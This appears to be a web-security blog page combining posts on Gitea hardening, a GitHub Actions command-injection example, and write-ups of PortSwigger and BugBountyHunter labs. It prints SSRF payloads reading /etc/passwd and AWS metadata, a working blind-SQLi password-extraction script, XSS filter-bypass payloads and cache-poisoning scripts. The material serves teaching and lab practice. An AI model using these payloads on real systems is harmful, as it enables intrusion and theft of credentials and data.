
Category: Web Security

Gitea: Configuration Hardening

Below are some Gitea configuration options that are useful for security hardening:

Config Reference: https://docs.gitea.io/en-us/config-cheat-sheet/

The more features we disable, the smaller the attack surface we expose when using Gitea.

version: "3"

networks:
  gitea:
    external: false

volumes:
  gitea-data:
    driver: local
  gitea-config:
    driver: local

services:
  server:
    image: gitea/gitea@sha256:ef6279e13e223d956bc417f299a3530795afcf79f3af429a5c893262c550a648
    container_name: gitea
    environment:
      - USER_UID=1000
      - USER_GID=1000
      - GITEA__repository__DISABLE_DOWNLOAD_SOURCE_ARCHIVES=true
      - GITEA__repository__DISABLE_HTTP_GIT=true
      - GITEA__repository_0X2E_upload__ENABLED=false # [repository.upload] section; dots in section names are escaped as _0X2E_ in env vars
      - GITEA__server__DISABLE_SSH=true
      - GITEA__security__DISABLE_GIT_HOOKS=true
      - GITEA__security__DISABLE_WEBHOOKS=true
      - GITEA__security__PASSWORD_COMPLEXITY=on
      - GITEA__security__MIN_PASSWORD_LENGTH=10
      - GITEA__attachment__ENABLED=false
      - GITEA__api__ENABLE_SWAGGER=false
      - GITEA__packages__ENABLED=false
      - GITEA__migrations__ALLOWED_DOMAINS=github.com,*.github.com
      - GITEA__repository__MAX_CREATION_LIMIT=0
      - GITEA__security__PASSWORD_HASH_ALGO=argon2
      - GITEA__mirror__DISABLE_NEW_PUSH=true
      - GITEA__service__DISABLE_REGISTRATION=true
      - GITEA__repository__DISABLED_REPO_UNITS=repo.issues, repo.ext_issues, repo.pulls, repo.wiki, repo.ext_wiki, repo.projects
      - GITEA__service__DEFAULT_ALLOW_CREATE_ORGANIZATION=false
      - GITEA__service__DEFAULT_USER_IS_RESTRICTED=true
      - GITEA__repository__DISABLE_MIGRATIONS=true # Set as false when there is new mirror
      - GITEA__mirror__DISABLE_NEW_PULL=true # Set as false when there is new mirror
    restart: always
    networks:
      - gitea
    volumes:
      - gitea-data:/var/lib/gitea
      - gitea-config:/etc/gitea
      - /etc/timezone:/etc/timezone:ro
      - /etc/localtime:/etc/localtime:ro
    ports:
      - "3000:3000"
      - "222:22"

How to integrate Gitea with Okta (Authentication)?

Start up Gitea

Create a docker.compose.yml file with the latest Gitea rootless image:

version: "3"

networks:
  gitea:
    external: false

services:
  server:
    image: gitea/gitea@sha256:ef6279e13e223d956bc417f299a3530795afcf79f3af429a5c893262c550a648
    container_name: gitea
    environment:
      - USER_UID=1000
      - USER_GID=1000
    restart: always
    networks:
      - gitea
    volumes:
      - ./gitea:/data
      - /etc/timezone:/etc/timezone:ro
      - /etc/localtime:/etc/localtime:ro
    ports:
      - "3000:3000"
      - "222:22"

Run a command to start Gitea as a Docker container on your machine:

docker-compose --project-name gitea -f docker.compose.yml up -d
docker ps -a # Check if the containers are running

Go to http://localhost:3000 and you can see that a local instance of Gitea is running.

Okta integration

Create a Web app in Okta:

Configure the redirect URL: http://localhost:3000/user/oauth2/okta/callback

Save the Client ID and Client Secret; these will be entered into Gitea.

You must give the authentication source the same name that appears in the redirect URL path. In this case, I have named it okta:

http://localhost:3000/user/oauth2/okta/callback

The admin should paste the Client ID and Client Secret from the Okta app into the Authentication Sources tab under “Site Administration”.

Test the integration between Gitea and Okta

Sign in with OpenID

You will be redirected to Okta for authentication (ensure MFA is enabled, preferably with FIDO2).

If this is the first time you are logging in to Gitea, you will need to fill in a username and email address to create an account.

GitHub Actions Misconfiguration Causing Command Injection

Suppose you have a GitHub Actions workflow like the one below:

The workflow is triggered when a new comment is added to an issue or an existing comment is edited.

name: GitHub Actions Demo
on:
  issue_comment:
    types: [created, edited]
jobs:
  Explore-GitHub-Actions:
    runs-on: ubuntu-latest
    steps:
      - run: echo "🎉 The job was automatically triggered by a ${{ github.event_name }} event."
      - run: echo "🐧 This job is now running on a ${{ runner.os }} server hosted by GitHub!"
      - run: echo "🔎 The name of your branch is ${{ github.ref }} and your repository is ${{ github.repository }}."
      - run: echo ${{ github.event.comment.body }}

Notice that ${{ github.event.comment.body }} is used directly in the run step? This makes the workflow vulnerable to command injection. Why?

Read this: https://securitylab.github.com/research/github-actions-untrusted-input/#remediation

Because the expression is expanded into the shell command before the step runs, anyone can inject commands into the workflow simply by adding a payload to an issue comment, and the workflow runs every time a new comment is created. For example, a comment body such as "hello; echo bye" turns the run step into "echo hello; echo bye", so the injected echo bye executes on the runner.

Did you notice we can run echo bye? This is just a simple example, but a worse scenario could be a reverse shell (if you are using self-hosted GitHub runners) or theft of secrets.

See that we can echo bye

You can even attack in stealth mode by deleting the comment as soon as the workflow is triggered.

How to prevent the issue?

Assign the GitHub context data to an environment variable before using it in the run step:

[...]
      - env: # Add this
          BODY: ${{ github.event.comment.body }} # Add this
        run: echo "$BODY"

Add a new comment that contains a payload:

You can see that the workflow now treats the comment body as a plain string rather than interpolating it into the command to execute.

Notes on Finding Evasive Bugs (by James Kettle)

I highly recommend security researchers watch this talk. It focuses on improving your methodology and mindset:

  1. Don’t look for defences; start with the attacks first.
  2. Look for unfashionable flaws.
  3. Your understanding of a vulnerability concept may be corrupted. Don’t rely on internet searches to learn; learn from the original sources.
  4. Recognise the fear of the new or unknown (“the technique sounds cool, but…”).
  5. Recognise when you think an idea is implausible. Don’t just try something and then give up if it does not work. Instead, explain why the idea will not work unless condition X exists, and try the obvious to make sure it really is obviously secure.
  6. Invisible chain links give you advantages. They can be tied to a particular context, require application-specific knowledge, or simply be inconvenient. For example, Param Miner works well if you have application-specific knowledge.

Automation

  • Use automation to scan for clues about the application.
  • Scan to learn:
    • Test hypotheses.
    • Ask questions and iterate.
  • When enumerating, focus on specific things rather than broad information to reduce noise.
    • Make asking questions cheap.
    • Develop your own framework.

Purpose of DevSecOps and its future

“…make sure that the constraint is not allowed to waste any time. Ever. It should never be waiting on other resource for anything, and it should always be working on the highest priority commitment the IT Operations organization has made to the rest of the enterprise. Always.”

The Phoenix Project

The NUMBER ONE constraint in the Security department is people.

It is unlikely we can hire enough people to match the number of developers and operations engineers.

The way to free up our constraint (people) is to automate as many tasks as possible so that people can focus on the work that is unique and contextual.

Another way is to take a preventative approach by educating developers and ops engineers on the security best practices they need to follow (this means secure-by-default configurations, documentation, and guides). This is the famous Netflix “paved roads” approach.

“…any improvement not made at the constraint is just an illusion, yes?”

The Phoenix Project

Crafting your AppSec Learning Methodology

Information Security is a broad field with many specialties such as Infrastructure Security, Cloud Security, Container Security, DevOps automation, and Application Security (at the source code / design level). In a real-life context, an Application Security engineer may need to focus on a few of these specialties, since modern applications rely on Cloud PaaS / IaaS and containers.

Since there are so many specialties to learn, you may get overwhelmed by the amount of knowledge and by how to apply what you learn in an actual context. I read an interesting Div0 post about a cybersecurity career discussion panel on this topic:

Many aspiring cybersecurity practitioners say they are passionate about cybersecurity. But they have no work to show/prove their passion. Don’t just say you are passionate. Do it, show it!

There’s no shortage of aspiring cybersecurity practitioners who want to learn. However, there’s a lack of drive on how they can contribute to the organization. Continuous learning in a fast-moving industry like cybersecurity is important. However, you should also focus on how you can apply your skills (emphasis mine).

Cybersecurity is not just about technical skills. In fact, picking up technical skills is the easy bit. Shaping your attitude and mindset in how you deliver the promise your clients entrusted in you plays a much bigger role.

An essential characteristic to have in the industry is Grit — the passion and sustained persistence towards long-term achievement.

In a wide discipline like cybersecurity, it is important to collaborate and bounce ideas with fellow practitioners — that’s how you push the boundary.

The mad rush to get all the fancy certifications is not healthy. There’s no point being certified but you still can’t get a complete grasp on security controls or even the fundamentals. Focus on building up your skillset, not the alphabets behind your name.

Often, Application Security new joiners who do not come from a development background have to learn development skills through their own projects. They may be pentesters, sysadmins, DevOps engineers, or career changers from another field. Each of them has their own unique perspective.

You need to understand development but…

If you look at Application Security job descriptions, many companies require a development background. This requirement ensures that you can empathize with the development teams you will be working closely with.

Be careful not to become too developer-like, because you will lose your independent assessment if you are too close to the development team. For example, a developer may tell you that a SQL injection finding is not a risk since the string values come from a hardcoded config file. If you are too close to the dev team, you might accept the risk without pointing out the additional caution needed.

However, from another independent perspective, this means SQL injection can still happen if a rogue developer / QA / DevOps engineer changes the config value to a SQLi payload. The long-term solution is to use parameterized queries and prepared statements even though the values are hardcoded. But if you are too close to the dev team, you will start to feel their pain and deadlines when the feature is not released on time, so you might not even suggest the more secure approach, or you might only ask the team to add it to the backlog. Whether the safer approach is ever adopted remains to be seen, since there is always another new feature to complete.
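
To make the recommendation concrete, here is a minimal sketch in Python, with sqlite3 standing in for whatever database the team actually uses: the parameterized version stays safe even if the "hardcoded" config value is later swapped for something hostile.

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'admin')")

# Value that comes from a hardcoded config file today, but could be changed
# to a SQLi payload by anyone who edits that file later.
role_from_config = "admin"

# Vulnerable pattern: string concatenation builds the SQL statement.
# query = "SELECT name FROM users WHERE role = '" + role_from_config + "'"

# Safer pattern: a parameterized query treats the value purely as data.
rows = conn.execute(
    "SELECT name FROM users WHERE role = ?", (role_from_config,)
).fetchall()
print(rows)  # [('alice',)]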

Security Champions might also struggle to give an independent assessment, especially since they are part of the dev team. Moreover, many of them are developers or QA engineers with their own deadlines and user stories to complete. Security Champions therefore cannot do it alone and need to pair with an internal Security SME to give a balanced assessment.

On the other hand, if you are too far from the development team, you will start suggesting security activities lifted from PDFs or slides that never gain any traction with the team. Many ideas sound great in PowerPoint but are difficult to put into practice, because the real world has many decision-making factors of which security is only one. You need to understand at least some of the major ones, such as business risk appetite, ROI, and regulatory requirements.

Not enough to learn Development

To understand Application Security in depth, newcomers have to pick up coding and software development concepts such as MVC on side projects or on the job. It takes time and requires a lot of experimentation, reading, note-taking, and questioning.

You shouldn’t just learn coding by watching a Udemy course on Web or Mobile Development. After all, your job also covers the security aspects of delivery, and most development courses do not mention Application Security topics. This means you need to create your own contexts in which to apply every Application Security topic you have studied.

An example of how I apply newly learned security knowledge to coding

Recently, I attended an online webinar on building secure React applications. It was an informative talk with hands-on examples that I recommend people watch.

My first thought was to revisit the React code that I had written on my own.

import React from 'react';

const Option = (props) => {
    return (
        <div>
            <li>{props.name}</li>
            <button
                onClick={(e) => {
                    props.handleDeleteOption(props.name);
                }}
            >
                Remove
            </button>
        </div>
    );
};

export default Option;

Previously, my understanding was that ReactJS is a secure-by-default library and that XSS is difficult to achieve unless a developer uses dangerouslySetInnerHTML. But from the video, I updated my understanding of ReactJS and recognized more XSS attack surface.

Then I tried to modify my React component code to create the XSS vulnerability. Imagine the developer thinks that the name coming from props is safe to use in href.

import React from 'react';

const Option = (props) => {
    return (
        <div>
            <li>{props.name}</li>
            <a href={props.name}>Click for more info</a>
            <button
                onClick={(e) => {
                    props.handleDeleteOption(props.name);
                }}
            >
                Remove
            </button>
        </div>
    );
};

export default Option;

But if the attacker supplies a javascript: URL as the name (for example, javascript:alert(document.cookie)), there is a stored XSS issue: the value is rendered into the href attribute and the script runs when the link is clicked.

From now on, when I look at ReactJS code, I will include such checks in my code review methodology. And when I look at a ReactJS app, I will be more aware of things to look out for, such as user-controlled href and src attributes.

Testing for SSRF during PDF Generation


How to test for SSRF during PDF Generation?

For SSRF via PDF generation to be possible:

  • User input is reflected in the generated PDF.
  • HTML elements are parsed by the PDF generator library.

Research the specific types of data that the target’s PDF generator library can parse in order to craft a payload.

Payloads

If HTML is parsed directly:

Recon

<script>
  document.write(window.location.href); 
  document.write(window.location.hostname); 
  document.write(window.location.pathname); 
  document.write(window.location.protocol); 
  document.write(window.location.host); 
  document.write(window.location.port); 
</script>

Redirect with iframe

<iframe src="http://localhost/?redirect=http://xxxx.burpcollaborator.net/x.png">

AWS

<iframe src="http://169.254.169.254/user-data">

Files

<iframe src="file:///etc/passwd">

WeasyPrint PDF Test

Trying to embed a secret file in the PDF? You can try this payload if the target parses an HTML page. One approach is to host the index.html file somewhere reachable (Heroku, a simple python3 -m http.server, etc.) and pass its URL to the target’s PDF generation endpoint.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>WeasyPrint PDF Test</title>
    <link rel=attachment href="file:///{path_to_secret_file}">
</head>
<body>
    <h1>WeasyPrint PDF Test</h1>
</body>
</html>

In the PDF reader, open up the Attachment section and view the embedded file.

Resources

https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Ben-Sadeghipour-Owning-the-clout-through-SSRF-and-PDF-generators.pdf

Notes on Blind SQL Injection

https://portswigger.net/web-security/sql-injection/cheat-sheet

Lab: Blind SQL injection with conditional responses

https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses

In this lab, we use differences in the application’s responses to enumerate the password of the “administrator” account. First, we check whether the “administrator” account exists and determine the length of the password. Once this is done, we use a substring query to enumerate each character of the password.

You can use Burp Repeater or Intruder to enumerate the password, but I find both methods time-consuming, so I wrote a script instead. The script looks for the “Welcome” string in the response; when it appears, the script records the character and moves on to the next position until every character of the password has been enumerated.
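
Below is a minimal sketch of such a script in Python. It assumes, as in the lab, that the injection point is the TrackingId cookie and that a true condition makes "Welcome" appear in the response; the lab URL, session cookie, character set, and password length are placeholders to adjust.

import string
import requests

# Placeholders: point these at your lab instance and session.
TARGET = "https://YOUR-LAB-ID.web-security-academy.net/"
COOKIES = {"TrackingId": "abc", "session": "YOUR-SESSION-COOKIE"}
CHARSET = string.ascii_lowercase + string.digits  # extend if needed
PASSWORD_LENGTH = 20  # determined earlier with a LENGTH(password)=N check

def condition_is_true(payload: str) -> bool:
    cookies = dict(COOKIES)
    cookies["TrackingId"] += payload
    resp = requests.get(TARGET, cookies=cookies)
    return "Welcome" in resp.text

password = ""
for position in range(1, PASSWORD_LENGTH + 1):
    for candidate in CHARSET:
        payload = (
            "' AND SUBSTRING((SELECT password FROM users "
            f"WHERE username='administrator'), {position}, 1)='{candidate}"
        )
        if condition_is_true(payload):
            password += candidate
            print(f"Position {position}: {candidate} -> {password}")
            break

print("Recovered password:", password)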

Writeups on Free Challenges in BugBountyHunter

In this post, I will share some writeups on the free challenges on the BugBountyHunter platform. I encourage everyone to check out the site https://www.bugbountyhunter.com/.

Cross-Site Scripting in Image Tag

https://www.bugbountyhunter.com/challenge?id=2

How does the feature work? If you select a dropdown option, the image is rendered with special effects using CSS. In the img tag, we can see that the selected option value appears in the class attribute.

What could go wrong? The POST request looks suspicious.

Request

There is no server-side validation of the imageClass value. You can send any value and it will be reflected in the response.

Response

We can try sending a few payloads to test for an XSS issue. First, we modify the imageClass value to imageClass=helloworld" onload="alert(1)". The response returns class="1" in the tag. We then try imageClass=helloworld" onclick="alert(1)". The response also returns class="1" in the tag.

It seems there is some blacklisting of keywords such as onload and onclick, so we need to find an event handler that is not blacklisted. Fortunately, this payload was not blocked: img2" onpointerup="alert('xss').

When we click on the image in the browser, the malicious script is executed.
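
If you want to automate the search for an event handler that is not blacklisted, a rough Python sketch along these lines can help. The endpoint URL is hypothetical, and the parameter name and reflection check are assumptions based on this write-up, so adjust them for the actual challenge.

import requests

# Hypothetical endpoint; the imageClass parameter comes from the write-up above.
TARGET = "https://challenge.example.com/image"
HANDLERS = ["onload", "onclick", "onerror", "onmouseover", "onfocus", "onpointerup"]

for handler in HANDLERS:
    payload = f'helloworld" {handler}="alert(1)'
    resp = requests.post(TARGET, data={"imageClass": payload})
    # If the handler survives into the response unmodified, it is probably not blacklisted.
    if f'{handler}="alert(1)"' in resp.text:
        print(f"[+] {handler} appears to be allowed")
    else:
        print(f"[-] {handler} seems to be filtered")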

Notes on Web Cache Poisoning

An attacker can use the Web Cache Poisoning technique to serve malicious responses to other users. The poisoning happens when certain unkeyed inputs are not validated by the application, allowing a malicious response to be cached.

Basic Example: Unkeyed Header

https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws/lab-web-cache-poisoning-with-an-unkeyed-header

In the request, the attacker discovers that the X-Forwarded-Host value is reflected in the response. The page loads a tracking.js file from its resources, and that response is cached. When the attacker supplies a specific host in the X-Forwarded-Host header, tracking.js is instead loaded from <malicious host>/resources/js/tracking.js. Consequently, the attacker controls the content of tracking.js and can serve malicious JavaScript (potentially leading to issues such as XSS).

Unkeyed header
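
In the PortSwigger labs, the response carries an X-Cache header showing whether it was served from the cache, so a rough Python sketch of the poisoning loop could look like this; the lab host and exploit-server host are placeholders.

import requests

# Placeholders: point these at the lab instance and your exploit server.
TARGET = "https://YOUR-LAB-ID.web-security-academy.net/"
EVIL_HOST = "YOUR-EXPLOIT-SERVER-ID.exploit-server.net"

# Keep sending the poisoned request until the cache serves our copy.
for attempt in range(10):
    resp = requests.get(TARGET, headers={"X-Forwarded-Host": EVIL_HOST})
    reflected = EVIL_HOST in resp.text
    cache_state = resp.headers.get("X-Cache", "unknown")
    print(f"attempt={attempt} reflected={reflected} X-Cache={cache_state}")
    if reflected and cache_state == "hit":
        print("[+] Poisoned response is now being served from the cache")
        break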

Case of Unknown Header

https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws/lab-web-cache-poisoning-targeted-using-an-unknown-header

In most situations, you will need to guess the unkeyed header. If you are using Burp Suite, Param Miner is a useful extension for this.

First, go to the Target tab and select the in-scope paths. Then right-click the selected paths and click Guess headers.

If you are using Burp Pro, you can see the results appearing in Dashboard – Issue activity.

Some sites use the Vary header in the response to decide whether a cached response can be reused or must be refreshed from the server. In the lab example, User-Agent appears in the Vary header, so it is effectively part of the cache key. To target a victim, you need to know their User-Agent and use that value in your poisoning request.

In our poisoning request, we use X-Host and the victim’s User-Agent. Keep sending the request until you see X-Cache: hit.
In the Vary header, we see that User-Agent is used in the caching decision.


DOM XSS from Web Cache Poisoning

https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws/lab-web-cache-poisoning-to-exploit-a-dom-vulnerability-via-a-cache-with-strict-cacheability-criteria

In this example, we see how Web Cache Poisoning can lead to DOM XSS. In some cases, an application takes property values from a JSON response and uses them dynamically in the DOM. The assumption is that these values can be trusted since they are controlled by the application. However, if the application is susceptible to Web Cache Poisoning, these values can end up under the attacker’s control.

In the example, we first see that there is a host injection issue: if you use X-Forwarded-Host, the injected host value is reflected in the response.

In the response, we can also see that the injected hostname is used to retrieve a JSON file. Using the exploit server provided in the lab, the access log shows a user making a GET request for the geolocate.json file.

If we examine the JavaScript carefully, we can see that the country value is taken from the JSON file and assigned to innerHTML. This is a classic DOM XSS attack surface to take note of.

After tracing the original JSON value, we can see that there is a property called ‘country’ whose value is passed to innerHTML.

UI showing the JSON value

Since we have found the attack surface, we can now create a JSON file on the exploit server that returns the DOM XSS payload. Access-Control-Allow-Origin needs to be a wildcard so that the object can be shared with the application, which fetches it cross-origin.
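
As a rough illustration of what the exploit server needs to return (in the lab you configure this through the exploit server UI rather than running your own server), a poisoned geolocate.json response might look like the Python sketch below; the payload mirrors the lab, but treat the details as assumptions.

from http.server import BaseHTTPRequestHandler, HTTPServer

# The "country" property carries the DOM XSS payload that the vulnerable page
# later assigns to innerHTML.
PAYLOAD = b'{"country": "<img src=1 onerror=alert(document.cookie)>"}'

class ExploitHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        # Wildcard CORS so the victim page is allowed to read the response.
        self.send_header("Access-Control-Allow-Origin", "*")
        self.end_headers()
        self.wfile.write(PAYLOAD)

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8000), ExploitHandler).serve_forever()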

Once this is in place, the Web Cache Poisoning succeeds and the DOM XSS payload is executed.

References

https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection

https://portswigger.net/web-security/web-cache-poisoning

https://portswigger.net/research/practical-web-cache-poisoning